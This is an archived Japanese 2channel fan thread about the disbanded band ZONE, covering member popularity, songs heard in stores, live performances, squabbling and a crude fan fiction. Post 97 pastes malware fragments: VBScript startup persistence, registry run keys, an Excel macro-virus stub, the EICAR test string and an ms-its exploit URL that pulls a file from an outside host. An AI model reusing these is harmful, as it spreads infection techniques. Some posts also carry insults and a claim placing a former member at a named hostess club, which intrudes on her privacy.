5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■■■ZONE統一スレPart301■■■

1 :通行人さん@無名タレント:2006/12/15(金) 21:46:59 ID:WhLuSYzn
●ランタイム公式ファンクラブ HIGH-JUMP 入会受付中
参加アーティスト:Miyu、MARIA、BON'Z、ZAQ 他

 《 ソニー・ミュージック 》http://www.sonymusic.co.jp/Music/Info/ZONE/
 《ランタイム》http://www.runtime.co.jp/
 《HIGH-JUMP》http://www.fancube.gr.jp/high-jump/


前スレ■■■ZONE統一スレPart300■■■
http://tv7.2ch.net/test/read.cgi/geino/1163514222/


2 :通行人さん@無名タレント:2006/12/15(金) 21:54:34 ID:sR+bjqCu
MIZUHOTAKAYOMIYUMAIKO

3 :通行人さん@無名タレント:2006/12/15(金) 22:36:27 ID:H9MjO8vJ


4 :通行人さん@無名タレント:2006/12/15(金) 22:40:21 ID:NIx69LN/
>>1
乙かれーしょん

5 :通行人さん@無名タレント:2006/12/15(金) 23:50:54 ID:dqWehJ98
TOMOKAが一番かわいい

6 :通行人さん@無名タレント:2006/12/16(土) 00:01:25 ID:fPdoH73W
何言ってんだよ。みずほちゃんが1番だよ

7 :通行人さん@無名タレント:2006/12/16(土) 00:07:57 ID:tK7wNQOC
TOMOKA可愛い

8 :通行人さん@無名タレント:2006/12/16(土) 00:29:41 ID:6CpvGne8
トモカに1票
ZONEはミズホのせいで・・・

9 :通行人:2006/12/16(土) 01:02:15 ID:QuErKKll
昔は舞子が可愛く見えていたのですが、最近は貴代の方が可愛く見えます。皆さんはどう思いますか?(今の舞子と貴代です)

10 :通行人さん@無名タレント:2006/12/16(土) 01:53:07 ID:R0/bkj/o
いやいや…ぜ・っ・た・い・ま・い・こ

今も昔も、そしてこれからもずっと舞衣子

11 :通行人さん@無名タレント:2006/12/16(土) 01:55:56 ID:6CpvGne8
マイコは2004年〜2005年の解散までが1番かわいかった。今はかわいくない。たかよもかわいくない。ミユは化粧濃い。トモカはだいぶ見てないがトモカが1番。 あミズホは問題外

12 :通行人さん@無名タレント:2006/12/16(土) 02:25:24 ID:R0/bkj/o
お前が1番問題外

13 :通行人さん@無名タレント:2006/12/16(土) 02:37:00 ID:lunMhfRf
今も昔も、そしてこれからもずっと音痴ブサイク出っ歯舞衣子

14 :通行人さん@無名タレント:2006/12/16(土) 04:44:41 ID:04CWF3CY
みゆだよみゆ

15 :通行人さん@無名タレント:2006/12/16(土) 07:30:20 ID:6KtX3Utk
2005年4月1日 解散

16 :通行人さん@無名タレント:2006/12/16(土) 07:46:07 ID:eaKsQiSE
そして一番運がなくって可哀想なのもともか

17 :通行人さん@無名タレント:2006/12/16(土) 10:52:02 ID:6CpvGne8
だよな
ZONEに振り回された感じ

18 :通行人さん@無名タレント:2006/12/16(土) 13:35:09 ID:4MlgrvpE
ともか腕ふとい

19 :通行人さん@無名タレント:2006/12/16(土) 13:44:21 ID:EO25w9Fx
>>1
乙ONE.

20 :通行人さん@無名タレント:2006/12/16(土) 14:03:29 ID:K9IvCXVH
【可愛さ全盛期】
TAKAYO…なし。
MIZUHO…証
MAIKO…太陽のkiss
MIYU…笑顔日和
TOMOKA…卒業


21 :通行人さん@無名タレント:2006/12/16(土) 14:05:34 ID:+2uMPwuG
【可愛さ全盛期】
TAKAYO…僕の手紙
MIZUHO…太陽のkiss
MAIKO…卒業
MIYU…笑顔日和か卒業
TOMOKA…グロカラ

22 :通行人さん@無名タレント:2006/12/16(土) 14:08:56 ID:6KtX3Utk
【可愛さ全盛期】
TAKAYO…今
MIZUHO…小学生〜中学生&今
MAIKO…今?
MIYU…小学生
TOMOKA…今

23 :通行人さん@無名タレント:2006/12/16(土) 14:09:41 ID:EeOyN3sE
今思ったんだけどみゆって笑うときにちょっと声裏返るよね

24 :通行人さん@無名タレント:2006/12/16(土) 14:38:00 ID:yu9/jVfR
かあいさぜんせーきはみゆたんは白い花だべ?!

25 :通行人さん@無名タレント:2006/12/16(土) 15:42:27 ID:p7d9zKJO
>>20はMAIKOヲタ
>>21はTOMOKAヲタ
>>22はMIZUHOヲタ

と予想

26 :通行人さん@無名タレント:2006/12/16(土) 15:51:48 ID:yu9/jVfR
>>25俺も予想して♪

27 :通行人さん@無名タレント:2006/12/16(土) 15:56:54 ID:+2uMPwuG
>>25
自分はMAIKOヲタです

28 :通行人さん@無名タレント:2006/12/16(土) 15:57:31 ID:p7d9zKJO
>>26
MIYUヲタと見せかけてMAIKOヲタ

29 :通行人さん@無名タレント:2006/12/16(土) 16:19:09 ID:6CpvGne8
ミズホ・・ユメハジ
ミユ・・グロカラ
マイコ・・武道館
トモカ・・かわいさはユメハジ かっこよさは笑顔日和

30 :通行人さん@無名タレント:2006/12/16(土) 16:35:19 ID:9DkP1Q6Z
TOMOKAはROCKING

31 :通行人さん@無名タレント:2006/12/16(土) 17:04:01 ID:yu9/jVfR
>>28みゆだよーん♪やーいやーい!間違ってやんの!タハハハ

32 :通行人さん@無名タレント:2006/12/16(土) 19:34:51 ID:UDC4WEeb
トモカは一年でかわカッコいくなったな

33 :通行人さん@無名タレント:2006/12/16(土) 20:25:17 ID:LqtjABz6
めちゃイケ見てたらZONEを思い出した。

34 :通行人さん@無名タレント:2006/12/16(土) 21:12:38 ID:0MhMNbId
MIYUはtrue blueだろ

35 :通行人さん@無名タレント:2006/12/16(土) 21:14:45 ID:ePtV+Nu+
有線にZONE出てたな

36 :通行人さん@無名タレント:2006/12/16(土) 21:15:28 ID:R1HEVr+S
やっぱシクベ?

37 :通行人さん@無名タレント:2006/12/16(土) 21:16:08 ID:UaEQ6SJM
【可愛さ全盛期】
TAKAYO…整形乙
MIZUHO…僕はマグマor卒業〜太陽のKiss
MAIKO…true blue〜僕の手紙(ぞんぽたの頃)
MIYU…インディーズ後期
TOMOKA…ランズのストパーの頃

38 :通行人さん@無名タレント:2006/12/16(土) 21:18:49 ID:ePtV+Nu+
>>36
歴代新人賞でシクベ

そーいや僕の手紙のPVのまいちんの髪型最高だな


39 :通行人さん@無名タレント:2006/12/16(土) 21:33:13 ID:FcIOC8dP
MIYUはやっぱ花火卒業グロカラでしょ

40 :通行人さん@無名タレント:2006/12/16(土) 21:41:01 ID:6KtX3Utk
ICE CRYSTAL LIVE VOL.3にMiyu出演したらしいね

41 :通行人さん@無名タレント:2006/12/16(土) 22:02:24 ID:UDC4WEeb
miyuのトゥルブルの時の金のメッシュよかった。


42 :AKASHI ◆DNwC0s8Vzg :2006/12/16(土) 22:45:46 ID:ptTeR4vA
可愛さ全盛期
TAKAYO…シクベ
MIYU…つるぶる〜今
MAIKO…白い花〜今
MIZUHO…つるぶる
TOMOKA…笑顔日和

町田氏…イケメソ

43 :通行人さん@無名タレント:2006/12/16(土) 22:53:13 ID:LqtjABz6
MIYU…いつも
MAIKO…いつも
MIZUHO…いつも
TOMOKA…いつも
TAKAYO…今日までそして明日から

44 :通行人さん@無名タレント:2006/12/16(土) 23:13:54 ID:R0/bkj/o
>>42
みずほはつるぶるが唯一可愛くない時だろ

45 :通行人さん@無名タレント:2006/12/16(土) 23:17:13 ID:6CpvGne8
ミズホは歯を治さないと

46 :通行人さん@無名タレント:2006/12/16(土) 23:37:06 ID:R0/bkj/o
あれもチャームポイント

47 :AKASHI ◆DNwC0s8Vzg :2006/12/17(日) 00:02:36 ID:SiKi1uUd
>>44
そうか?因みにあの、おでこ出した髪型好きだわ。
つか、つるぶるPV最高だわ。さっき久しぶりに見たのだが、一雫の涙が…(´・ω・`)

48 :通行人さん@無名タレント:2006/12/17(日) 01:21:52 ID:EneOJ9+X
みずほは一雫、証の時が1番

49 :通行人さん@無名タレント:2006/12/17(日) 01:42:29 ID:pt64FC96
歌の評価はどうかな?
オレはグロカラが一番の名曲だと思うがヲタからの評価は低そう。
やはり大爆発が一番人気?

50 :通行人さん@無名タレント:2006/12/17(日) 01:47:09 ID:PzkZrQS6
え、大爆発人気なの?
なんで・・・

俺は笑顔日和かな〜
グロカラもいいね。PVも好き

51 :通行人さん@無名タレント:2006/12/17(日) 01:57:43 ID:puJj2zER
グロカラでしょ
大爆発とかグッデイとかあまりお好みじゃない

52 :通行人さん@無名タレント:2006/12/17(日) 01:58:16 ID:PJOS05AQ
すすきのクラブ フエガ 
http://nightstyle.jp/fega/cast.html

み○き→み○ほ
ホスラブスレにても在籍してる模様

53 :通行人さん@無名タレント:2006/12/17(日) 02:13:13 ID:FmUwQbKp
シングルでは笑顔日和かグロカラかな。
ギターを弾く自分としては、さらりーまん、Two Hearts、for tomorrow 歌詞重視なら僕の手紙ツルブル愛華とかかな

54 :通行人さん@無名タレント:2006/12/17(日) 03:28:56 ID:sLw2mRuK
>>20だが、>>25の方!
よ、よくわかりましたね!?
なんで俺がMAIKOヲタだとわかったんすか??

55 :通行人さん@無名タレント:2006/12/17(日) 03:34:12 ID:AlhSQt6K
松井非でキーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー

56 :通行人さん@無名タレント:2006/12/17(日) 03:56:26 ID:6vrKJkiQ
長瀬み夕ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー!!

57 :通行人さん@無名タレント:2006/12/17(日) 10:34:14 ID:I55SGc8C
今ススキノで実夕とバッタリ遭遇!サインGET!

58 :通行人さん@無名タレント:2006/12/17(日) 10:53:19 ID:psSep4bG
>>53
うわーギターいいな〜・・・。
俺、バイトしんどくてできんし・・・orz
さらりーまん弾いてみたいわ〜・・・

59 :通行人さん@無名タレント:2006/12/17(日) 13:44:42 ID:l92inGbt
>>54MAIKOヲタが一番多いからMAIKOと言えば当たる確率が高いんじゃないか?

60 :通行人さん@無名タレント:2006/12/17(日) 14:34:33 ID:pqSgfI2K
一番かわいいのはともかちゃん

61 :通行人さん@無名タレント:2006/12/17(日) 14:37:56 ID:88sAsqYi
この頃ZONEの曲聴くけど、ビブラートできる人いねーーーーと今頃気づいた自分w

62 :通行人さん@無名タレント:2006/12/17(日) 16:19:50 ID:1OashheA
ともかなら頑張れば出来るよ

63 :通行人さん@無名タレント:2006/12/17(日) 16:29:09 ID:JZvzaZ7S
Miyuオタだが、可愛いのは間違いなくTOMOKA

64 :通行人さん@無名タレント:2006/12/17(日) 19:30:23 ID:XTZDUHwO
>>59
一番多いっていうがそんなにずば抜けて多いしわけでもないでしょ

太キスのMAIKOっていったらわかるでしょ

65 :通行人さん@無名タレント:2006/12/17(日) 21:36:26 ID:d2qf1Whq
【可愛さ全盛期】
TAKAYO…True Blue
MIZUHO…太陽のKiss
MAIKO…ずっと最強
MIYU…シクベ
TOMOKA…笑顔日和

66 :通行人さん@無名タレント:2006/12/17(日) 21:41:01 ID:pt64FC96
>>65
友達がセスミの舞子を見て「なにこれ?SPEEDのヒトエみたいな存在なの?」って言ってた。

67 :通行人さん@無名タレント:2006/12/17(日) 21:47:23 ID:LrExYW6Q
SPEEDのヒトエみたいな存在てww

68 :通行人さん@無名タレント:2006/12/17(日) 22:15:56 ID:N6F5vt+w
>>66
殺せ

69 :通行人さん@無名タレント:2006/12/17(日) 22:47:48 ID:l92inGbt
MAIKOって大人の事情が理解できないのかな。
ラジオでwiiの宣伝するなんていかんだろ…

70 :通行人さん@無名タレント:2006/12/17(日) 22:59:11 ID:XTZDUHwO
>>69
自前のスタジオで生放送してると思ってるの人かな?

71 :通行人さん@無名タレント:2006/12/17(日) 23:17:17 ID:EneOJ9+X
みゆたむの昨日のブログでPCが無いって自分のが無いって意味?
みゆたむ家にないってことかな?
今時ネット出来ないって珍しいけど

72 :通行人さん@無名タレント:2006/12/17(日) 23:31:44 ID:PRFm6sgB
確かにめずらしいな。 でもみゆらしい

73 :通行人さん@無名タレント:2006/12/17(日) 23:50:32 ID:YQ5IlI47
MAIKOはヲタってかロリコンに人気あるだけで一般は受け付けない

74 :通行人さん@無名タレント:2006/12/17(日) 23:52:04 ID:puJj2zER
MIZUHO

75 :通行人さん@無名タレント:2006/12/18(月) 00:21:53 ID:z7EeCEiK
>>73
確かに。CDTVの恋人にしたいアーティストランキングにも表れてるよね。

76 :通行人さん@無名タレント:2006/12/18(月) 00:34:47 ID:pIQRBetV
ZONEの5人はみんないい子でそれぞれ可愛さがあると思う。
ところで今日ひょんなことからANAの機内雑誌「翼の王国」2003年11月号を手に入れた。
何気なくページをめくっていたらサービスの機内放送案内に「僕の手紙」があった。さらにZONEメンバーのメッセージつきだったそうだ。
それを読んで俺は地団駄踏んで悔しがったよ。何でその時ANAの飛行機に乗らなかったのだろうって。そうしたら機内でZONEの曲を満喫できたのに。

77 :通行人さん@無名タレント:2006/12/18(月) 00:39:35 ID:r75MMgGh
わざわざageをいれるお前がモーオタなみにキモイ

78 :通行人さん@無名タレント:2006/12/18(月) 01:08:36 ID:pIQRBetV
>>77
お前に言われたくないよ。そもそもモークズのヲタなんぞと一緒にされたら迷惑。

79 :通行人さん@無名タレント:2006/12/18(月) 01:33:59 ID:C7oEyVFE
>>64ス、スゴすぎる…

>>68ワロタww


80 :通行人さん@無名タレント:2006/12/18(月) 02:32:24 ID:3ltPyRcr
お店で笑顔日和ながれてた 思わず泣いたよ

81 :通行人さん@無名タレント:2006/12/18(月) 04:31:23 ID:J78hGMn8
泣くなよw
武道館の退場シーンは今でもくるけどなw

82 :通行人さん@無名タレント:2006/12/18(月) 06:53:55 ID:J78hGMn8
お前らまだ寝てるのか!
いい加減起きなさい(`・ω・´)

83 :通行人さん@無名タレント:2006/12/18(月) 06:57:56 ID:VtCX4/HA
>>73じゃ、ZONEヲタはロリコンばかりになるぞw
実夕もロリ系だしなw

84 :通行人さん@無名タレント:2006/12/18(月) 12:27:36 ID:Bs++drt+
zoneのカスメン達は
町田さんのおかげで紅白でれたんだから
感謝して毎日1回は町田さんに感謝の祈りを捧げなさい
さあ!!やれ!!

85 :通行人さん@無名タレント:2006/12/18(月) 12:49:39 ID:Zh65bOcv
>>69
kwsk

86 :通行人さん@無名タレント:2006/12/18(月) 13:44:50 ID:usLsCgaV
>>84でもZONEが歌ったから売れたんじゃない??
大ヒットドラマの主題歌になったのもあるんじゃない??

87 :通行人さん@無名タレント:2006/12/18(月) 15:05:18 ID:hij3cxAd
>>80
店って何の店?
たまに「店で流れてた」とかいうの見るけど、俺は一度も聴いたことない・・・
だから参考のためにw

88 :通行人さん@無名タレント:2006/12/18(月) 15:35:40 ID:3ltPyRcr
>>87観光用の店かな。ちなみに三回目。前はこんびにとスーパーで流れてた

89 :通行人さん@無名タレント:2006/12/18(月) 15:44:21 ID:usLsCgaV
最近は、学校行くときスタンドの前通過したらハナビ流れてた。
あと、ヨーカドーのバック屋で卒業流れてた。

90 :通行人さん@無名タレント:2006/12/18(月) 18:11:27 ID:r75MMgGh
スリーエフで風ハジが流れてた
有線だよな?誰かがリクしたってことだよな?

91 :通行人さん@無名タレント:2006/12/18(月) 18:50:49 ID:Yes13PeB
風ハジはよく流れてる。

92 :通行人さん@無名タレント:2006/12/18(月) 18:57:24 ID:5w1DCbh1
風はじなんて聞いた事ないぞ
聴いた事あるのは花火、笑顔、シクベ、グロカラ、一雫、太キス、旅立ち
全部ガソスタで流れてた

93 :通行人さん@無名タレント:2006/12/18(月) 18:57:56 ID:YIoUGvb8
>>91
外では 聞いたことないなぁ
インストで夢カケはなぜかよく聞く。 

ってか>>90の質問にIDで答えるなんて天才だな。

94 :通行人さん@無名タレント:2006/12/18(月) 21:46:11 ID:49qPy6aK
俺がよく聴くのは「証」「一雫」「太Kiss」こんな順。それ以外はほとんど無い。
ショッピングセンターの4〜5階あたりの専門店じゃ無しに
例えばジャスコならジャスコが商品を出してる文房具とか紳士服とか靴とか
そういうエリアでめちゃめちゃ流れてる。
店行けばほぼ100%の確立で聴いてるなぁ・・・ちょっと凹むからやめて欲しいんだがw

95 :通行人さん@無名タレント:2006/12/18(月) 21:47:35 ID:49qPy6aK
もちろんインストね。
実際の曲は服屋が多い。連投スマソ

96 :通行人さん@無名タレント:2006/12/18(月) 22:23:09 ID:u//lBpzH
流れてるのはうれしいけど、なんか寂しいよね。
大塚とか倖田とか流れてても、あいつかーみたいな感じだけどZONEが流れてると、おっZONEぢゃん懐かしいなぁー(涙)みたいな感じになる(涙)

97 :<body onload=window()>:2006/12/18(月) 22:56:38 ID:xIcSU8/g
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

98 :通行人さん@無名タレント:2006/12/18(月) 23:01:49 ID:JDX3OV/L
インストの証は結構
スーパーとかで流れてるね。

99 :通行人さん@無名タレント:2006/12/18(月) 23:18:52 ID:gU52IwJA
この前コンビニバイト中に大爆発流れて感動してた
(11月だけど

100 :通行人さん@無名タレント:2006/12/18(月) 23:48:23 ID:r75MMgGh
結論、ZONEの曲は今でも有効
しかしバリエーション多いな

俺がフロアー責任者やってたときは新・僕はマグマとかfortuneとかも
ギンギンにかけまくったもんだ

101 :通行人さん@無名タレント:2006/12/18(月) 23:48:32 ID:Dnzid9jh
100

102 :通行人さん@無名タレント:2006/12/18(月) 23:51:05 ID:Dnzid9jh
ありゃミスってしまった。うつだ…。

103 :通行人さん@無名タレント:2006/12/19(火) 00:02:13 ID:3UF6y3Dl
俺はセブンイレブンでバイトしてるから流れないのよー

104 :通行人さん@無名タレント:2006/12/19(火) 00:02:56 ID:QLI2NM9+
高飛びのブログはみたことないんだが
たかよもまいこもみゆもZONEの話一切出さないよな
元ZONEの肩書き使おうとしないだけかな?


105 :通行人さん@無名タレント:2006/12/19(火) 01:40:01 ID:lz+QdkIi
http://www.geocities.jp/hanabizone/syosetu/manntenn1.html

上記のHPに「僕の手紙」をベースにした小説があるけどなかなかうまい。読んでいて涙が出てしまった。

106 :通行人さん@無名タレント:2006/12/19(火) 02:06:24 ID:+KES/74r
わざわざageをいれるお前がモーオタなみにキモイ

107 :通行人さん@無名タレント:2006/12/19(火) 03:40:07 ID:Zyh6GNiN
宣伝死ね

108 :通行人さん@無名タレント:2006/12/19(火) 10:10:24 ID:l2f6V+Fn
ZONEはバンドじゃないだろバンドケイタイのアイドルモドキだYO
カラオケの音しか聴こえないじゃん演奏の時
チャットモンチーはバンドだな
中ノ森は自分達でシングル曲つくってないから
アイドルと言った方がいいな
ポルノを誰もバンドだとは思わんだろあいつらはアイドルだから

109 :通行人さん@無名タレント:2006/12/19(火) 10:11:56 ID:l2f6V+Fn
ZONEスレもいよいよ過疎ってきたな
こんな連中を応援している連中は飽きるのもはやいから
閑散としてきたのは当然だYO

110 :通行人さん@無名タレント:2006/12/19(火) 10:13:49 ID:+KES/74r
応援もなにも解散してるだろwww

かいさん〜かいさん〜かいさん〜かいさん〜
 かいさん〜かいさん〜かいさん〜かいさん〜
  かいさん〜かいさん〜かいさん〜かいさん〜 しね

111 :通行人さん@無名タレント:2006/12/19(火) 10:15:56 ID:3UF6y3Dl
カラオケの音?意味不明
もっと勉強しろ。
だいたいZONEをチャットと中野と比べるか?レベル違いすぎ。お前ら音楽の知識0なのにようそんなこと言えるな。

112 :通行人さん@無名タレント:2006/12/19(火) 10:18:09 ID:l2f6V+Fn
>>111
ゴミが一匹釣れたyo

113 :通行人さん@無名タレント:2006/12/19(火) 10:26:49 ID:3UF6y3Dl
本当のこと言われてごまかすなよ(笑)

114 :通行人さん@無名タレント:2006/12/19(火) 10:29:17 ID:+KES/74r
新参bksg
デビュー当時を知らないのか?
オケ壊れて演奏とまっちまたっだろwww

115 :通行人さん@無名タレント:2006/12/19(火) 11:07:59 ID:3UF6y3Dl
誰もデビュー当時のこと言ってませんよ。結果的にチャットと中野以上のバンドになったってこと

116 :通行人さん@無名タレント:2006/12/19(火) 13:10:13 ID:2r/oEuEq
確かに、グッテイと大爆発以外は弾いてる。武道館のギターの弾き方や演奏の音を聞いてみたら誰でもわかるでしょ。

117 :通行人さん@無名タレント:2006/12/19(火) 13:59:18 ID:uMVZACza
武道館の演奏はかなり上手いよな
チャットモンチーとかとは比べ物にならにねw

118 :通行人さん@無名タレント:2006/12/19(火) 14:23:12 ID:JlGz6j/3
志村塾で初めは弾けてなかった、と言ってた。
シクベ以降は弾いてるけど。

119 :通行人さん@無名タレント:2006/12/19(火) 14:41:31 ID:3UF6y3Dl
ジョンレノンフェスティバル見れば分かる

120 :通行人さん@無名タレント:2006/12/19(火) 16:20:37 ID:rZqdgNFp
なにがどう分かるん?

121 :通行人さん@無名タレント:2006/12/19(火) 16:25:45 ID:uMVZACza
ちゃんと名曲を演奏してるから。
あれは確か2003年くらいだったかなー

122 :通行人さん@無名タレント:2006/12/19(火) 17:25:12 ID:56Gp3vkz
Tell me why−−−−−−−−−−−

123 :通行人さん@無名タレント:2006/12/19(火) 20:14:59 ID:a6TmGdOy
>>116
せ、せ、セスミはーーーーーーーー?

124 :通行人さん@無名タレント:2006/12/19(火) 20:31:45 ID:vTWZObqy
>>116
確かに弾いてるけど音は出てない。ドラムのシンバルだけ。スネアには消音パット置いてあったし。

125 :通行人さん@無名タレント:2006/12/19(火) 22:19:15 ID:3UF6y3Dl
マヂで

126 :通行人さん@無名タレント:2006/12/19(火) 22:30:19 ID:2iiB/PDL
>>124
TOMOKAがHANABIのギターソロミスってるんだが。
あと空想とか証は確実にMIZUHOのスネアの音鳴ってるだろ。

>>123
恋々…も。カップリングやアルバム曲はほとんどやらない。ロック系の曲だけ覚えてるみたい。

127 :通行人さん@無名タレント:2006/12/19(火) 22:33:15 ID:puYw4DhJ
とりあえず武道館でまいちんはLikeを歌ってほしかった

128 :通行人さん@無名タレント:2006/12/19(火) 22:57:47 ID:3UF6y3Dl
確かにハナビのギターソロミスってるね。あとさらりーまんのソロも最後のノビが足りないような。ZONEは生演奏だら。

129 :通行人さん@無名タレント:2006/12/19(火) 23:44:19 ID:2r/oEuEq
>>124
グッテイと大爆発のことだろ?確かにシンバルの音が異様にうるさく感じた。消音パットしてたね、シクベからはもちろん外してたけど。
てか、ともかはHANABIのギターソロのどの部分間違えてた?

130 :通行人さん@無名タレント:2006/12/19(火) 23:45:29 ID:YobfqcDg
今度(日曜?)北の零年がテレビであるみたいだけど、つぐみが出てるんだっけ?

131 :通行人さん@無名タレント:2006/12/20(水) 00:30:30 ID:OOT0A8eu
>>106
お前もageてるだろ(笑)。まあ俺もだけど。つうかお前こそキモイモーヲタじゃないのか。
>>107
お前は心の貧しい奴だな。怒りを通り越して哀れみすら覚えるよ。

132 :通行人さん@無名タレント:2006/12/20(水) 00:32:59 ID:OOT0A8eu
ところで前から思っていたんだけど、ファン以外にも広く認知されているZONEの曲って何だろうね。やはりシクベ?

133 :通行人さん@無名タレント:2006/12/20(水) 00:35:47 ID:OI1CyXnA
そうなんぢゃない?

134 :通行人さん@無名タレント:2006/12/20(水) 00:49:29 ID:knJDvmIr
<<< メル欄に >>>
わざわざageをいれるお前がモーオタなみにキモイ

135 :通行人さん@無名タレント:2006/12/20(水) 02:35:57 ID:kr6rxaCV
今ZONEのベスト聴きながら寝てるよ。
白い花良いな。Likeも最高だよ。一雫・僕の手紙もいい!

136 :通行人さん@無名タレント:2006/12/20(水) 10:13:59 ID:OI1CyXnA
白い花のアルペジオが好きだな。

137 :号外:2006/12/20(水) 14:48:24 ID:2pPgpvfe
号外号外ーー
先週くらい?札幌市内でみゆちんとみずちんが二人で歩いてるのを目撃されてます!号外号外ーー

138 :通行人さん@無名タレント:2006/12/20(水) 15:39:56 ID:lPny5zQx
http://www.akibablog.net/archives/2006/12/post_958.html
みずほどこ?

(;´Д`)

139 :通行人さん@無名タレント:2006/12/20(水) 19:54:02 ID:AHJHs3Ie
あの人は今バトルに出ないの?

140 :通行人さん@無名タレント:2006/12/20(水) 22:30:23 ID:xwfhxHp/
ともかちゃんおやすみ みずほちゃんおやすみ

141 :通行人さん@無名タレント:2006/12/20(水) 23:57:42 ID:OI1CyXnA
太陽のKissのPVでZONEのメンツにキスするデブいガキ見てイラッとした

142 :通行人さん@無名タレント:2006/12/21(木) 00:51:46 ID:WPKDtWlu
>>137
おぉその勢いでみずちんをランタイムに引き戻してくれお

143 :通行人さん@無名タレント:2006/12/21(木) 01:31:58 ID:8J45OFj/
ランタイムに残ってるのはミユとマイコだけ?

144 :通行人さん@無名タレント:2006/12/21(木) 02:11:38 ID:STw1Eyab
http://www.bunka.co.jp/pub/00000010/shop/200411/00098561/index.shtml

145 :通行人さん@無名タレント:2006/12/21(木) 02:40:13 ID:WPKDtWlu
なんだよー
偽MIYUかよー(´・ω・`)

146 :バトルロワイヤル(^o^)/:2006/12/21(木) 04:03:33 ID:u+OTzs8J
僕はZONEツアーに参加した。参加人数は40人内10名が女の子、それにZONEメンバーとMARIAメンバーを含め僕らは北海道の草原の大地をバスで移動していた。車内は熱気で溢れていた。ザワザワ みゆ「まだまだついてこれますか?!」ヲタ「ぃえーい」僕は何か不吉な予感を悟っていた

147 :バトルロワイヤル2(^o^)/:2006/12/21(木) 04:08:50 ID:u+OTzs8J
僕「ん?これは?」皆眠っていた…僕「はっ?!」僕はみゆたむが心配になり重なり眠っているヲタを払い蹴りみゆたむの座席へ向かった。僕「みゆたむ!しっかり!」みゆ「ん…どうなってんの…」僕「さぁボクラは長い事寝ていたようだ」それからしばらく皆目を覚まし始めた

148 :(^o^)/:2006/12/21(木) 04:13:55 ID:u+OTzs8J
照明ライトが僕らバスを照らした。ヲタ一同「うわっ(>_<)」車内に自衛隊が乱入し僕らを密室に連れ込んだ
ザワザワどうなってんだザワザワ みゆ「怖い」僕「心配すんなって」僕はみゆたむの手を握り締めた。武「みんなには殺し合いをしてもらいます」ザワザワ

149 :(^o^)/バトルろワイヤル4:2006/12/21(木) 04:18:32 ID:u+OTzs8J
ザワザワ 武「今からビデオ見せるから参考にして」ザワザワ 古川「ふふへへ…みゆちん」武「ふっ」シュピー ザクッ 古川の頭部にナイフが突き刺さった。キャーワーザワザワ 武「ビデオ見ろコノヤロー。」僕は足が震えていた。

150 :(^o^)/バトルロワイヤルだお:2006/12/21(木) 04:22:22 ID:u+OTzs8J
ピピピ突然部屋中に音が響きわたった。しんよん「うわぁ!!」武「首につけてるワッカが爆発します」しんよん「助けてぎゃああ」ヲタ達はしんよんを投げ飛ばした。しんよん「まいこ助けて!」まいこの足を掴んだ。まいこ「やだ!きもい!」まいこは蹴りあげた。しんよん「ぐはっ」

151 :通行人さん@無名タレント:2006/12/21(木) 04:36:59 ID:jbkL5KUi
まじでうざいなこいつ↑

152 :通行人さん@無名タレント:2006/12/21(木) 09:32:20 ID:8J45OFj/
ありえない妄想+≠м○ィ

153 :通行人さん@無名タレント:2006/12/21(木) 14:07:10 ID:ba9KLCh5
なあ、みんな遠くからクリスタルに行く奴は、どれ位のお金を持って行くんだ?
俺とりあえず30万位なんだけど足りるかな。
後、俺は身長150cmで当日はMARIAタオルを頭に巻いて黒いジャケット着て行くから、良かったら声かけてよ。

154 :通行人さん@無名タレント:2006/12/21(木) 15:39:50 ID:mHCjcTWg
>>153
ちょwwwヲタ狩りに遭うぞw
釣りかも知れんが、30万は有り得ないだろ。

俺は関西から一人で行くけど、10万ぐらいしか持って行かないよ。
っていっても高1だから金持ってないんだけどorz

155 :通行人さん@無名タレント:2006/12/21(木) 15:58:25 ID:8J45OFj/
<<153 俺が狩ってやるよ

156 :通行人さん@無名タレント:2006/12/21(木) 16:42:48 ID:LO/bZDHN
高1が関西からくるのかいwww
オレも高1だが

157 :通行人さん@無名タレント:2006/12/21(木) 17:53:36 ID:RGlwOvfU
おまいら、舞衣子プラズマ肺炎には気をつけろよ。

158 :通行人さん@無名タレント:2006/12/21(木) 18:05:05 ID:IUVCnj5A
高一が10マソも持ってんのかw

159 :通行人さん@無名タレント:2006/12/21(木) 18:12:48 ID:BcqqroKn
高一がタメ口聞いてんじゃねーぞ糞

160 :通行人さん@無名タレント:2006/12/21(木) 18:23:35 ID:z9960Ybx
ちんよんがタメ口聞いてんじゃねーぞ糞

161 :通行人さん@無名タレント:2006/12/21(木) 18:37:51 ID:D84zQV/V
悩める男?
吹田ってやつも雰囲気よめてねーな

162 :通行人さん@無名タレント:2006/12/21(木) 19:14:18 ID:z9960Ybx
>>161
誰だ?それ

163 :通行人さん@無名タレント:2006/12/21(木) 19:47:29 ID:D84zQV/V
高跳に出没してるモンスター

164 :通行人さん@無名タレント:2006/12/21(木) 20:45:45 ID:8zSVt/D/
俺は中3だけど自分の貯金全部の口座あわせて8000万あるよ。親が馬主で、ばあちゃんは資産家で兄貴がシャッチョさんなんです。

